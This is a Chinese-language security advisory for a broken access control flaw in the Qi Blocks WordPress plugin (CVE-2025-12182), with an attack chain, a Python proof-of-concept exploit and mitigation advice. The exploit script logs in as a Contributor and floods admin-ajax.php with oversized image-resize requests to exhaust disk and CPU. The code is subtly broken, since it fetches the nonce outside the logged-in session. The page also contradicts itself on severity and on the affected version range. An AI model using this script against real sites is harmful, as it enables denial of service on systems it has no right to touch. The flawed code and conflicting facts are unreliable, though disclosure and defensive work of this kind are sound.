CVE-2025-12182 Qi Blocks WordPress插件未授权图片调整漏洞

漏洞信息

漏洞编号

CVE-2025-12182

漏洞类型

访问控制绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Qi Blocks WordPress Plugin

漏洞概述

Qi Blocks是WordPress的一个流行页面构建器插件，广泛用于创建各种类型的网站页面。该插件在1.4.3及之前版本中存在严重的访问控制缺陷，攻击者可利用此漏洞绕过权限检查，对其他用户的媒体库图片进行非法操作。漏洞根源在于resize_image_callback()函数缺少必要的权限验证机制，允许任何具有Contributor权限的认证用户对任意图片执行调整大小操作。攻击成功后可能导致服务器磁盘空间被大量无用图片文件填满，造成存储资源耗尽；同时大量图片处理操作会消耗服务器CPU和内存资源，引发拒绝服务风险。此漏洞需要攻击者拥有WordPress网站的有效账号（至少Contributor角色），但攻击门槛相对较低，危害范围较广。

技术细节

该漏洞属于典型的Broken Access Control（访问控制失效）类型，存在于WordPress插件Qi Blocks的媒体处理模块中。具体漏洞点位于inc/media/class-qi-blocks-media.php文件的第138行resize_image_callback()函数。该函数负责处理图片调整大小的请求，但未对请求发起者的权限进行充分验证。

漏洞利用过程：攻击者首先需要注册一个WordPress账号并获取至少Contributor角色权限。Contributor角色在WordPress中通常只能撰写和管理自己的文章，但无法直接操作其他用户的媒体文件。然而，由于resize_image_callback()函数缺少current_user_can()或类似权限检查，攻击者可以通过构造特定的AJAX请求（通常为wp_ajax_*钩子），指定目标图片的attachment ID和期望的尺寸参数来触发图片调整功能。

攻击者可以指定任意媒体库中的图片（即使该图片属于管理员或其他用户），并设置极大的图片尺寸参数。这会导致WordPress生成大量图片文件副本，快速消耗服务器磁盘空间。同时，图片处理是一个CPU密集型操作，大量并发请求会造成服务器资源耗尽。

修复方案是在resize_image_callback()函数中添加权限检查逻辑，确保只有图片所有者或具有更高级别权限的用户才能执行图片调整操作。

攻击链分析

STEP 1

1

攻击者注册WordPress账号并获取Contributor角色权限

STEP 2

2

攻击者登录WordPress后台，获取有效的认证cookie和AJAX nonce

STEP 3

3

攻击者枚举目标媒体库中的图片ID，选择要攻击的图片（可以是其他用户的图片）

STEP 4

4

攻击者构造AJAX请求，调用qi_blocks_resize_image动作，指定目标图片ID和超大尺寸参数

STEP 5

5

服务器处理请求，由于缺少权限检查，执行图片调整操作，生成新的图片文件

STEP 6

6

重复触发或并发请求，导致大量图片文件生成，消耗磁盘空间和服务器CPU资源

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-12182 PoC - Qi Blocks Unauthorized Image Resize
# Target: WordPress site with Qi Blocks plugin <= 1.4.3

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"

def get_nonce(site_url):
    """Extract WordPress nonce for AJAX requests"""
    resp = requests.get(f"{site_url}/wp-admin/", timeout=10)
    nonce_match = re.search(r'nonce" value="([a-z0-9]+)"', resp.text)
    if nonce_match:
        return nonce_match.group(1)
    return None

def exploit(site_url, username, password):
    """Exploit unauthorized image resize vulnerability"""
    session = requests.Session()
    
    # Step 1: Login to WordPress
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{site_url}/wp-admin/",
        'testcookie': '1'
    }
    resp = session.post(f"{site_url}/wp-login.php", data=login_data, timeout=10)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Get AJAX nonce
    nonce = get_nonce(site_url)
    if not nonce:
        print("[-] Failed to get nonce")
        return False
    
    # Step 3: Get target image ID (any image in media library)
    # In real attack, attacker would enumerate image IDs
    target_image_id = 1  # Example image ID
    
    # Step 4: Trigger unauthorized image resize
    resize_data = {
        'action': 'qi_blocks_resize_image',
        'nonce': nonce,
        'attachment_id': target_image_id,
        'width': 5000,  # Large size to cause resource abuse
        'height': 5000
    }
    
    resp = session.post(f"{site_url}/wp-admin/admin-ajax.php", data=resize_data, timeout=30)
    
    if resp.status_code == 200:
        print(f"[+] Image resize triggered for attachment ID: {target_image_id}")
        print(f"[+] Response: {resp.text[:200]}")
        return True
    else:
        print(f"[-] Request failed with status: {resp.status_code}")
        return False

if __name__ == "__main__":
    exploit(TARGET_URL, USERNAME, PASSWORD)

影响范围

Qi Blocks WordPress Plugin < 1.4.3

防御指南

临时缓解措施

立即将Qi Blocks插件升级到1.4.4或更高版本。如果暂时无法升级，可采取以下临时措施：1) 限制新用户注册功能；2) 审查所有现有用户账号，移除不必要的Contributor角色账号；3) 使用WordPress安全插件监控异常的图片处理行为；4) 对admin-ajax.php请求实施访问日志记录和分析。同时建议在Web应用防火墙（WAF）上添加规则，检测和阻止异常的qi_blocks_resize_image请求模式。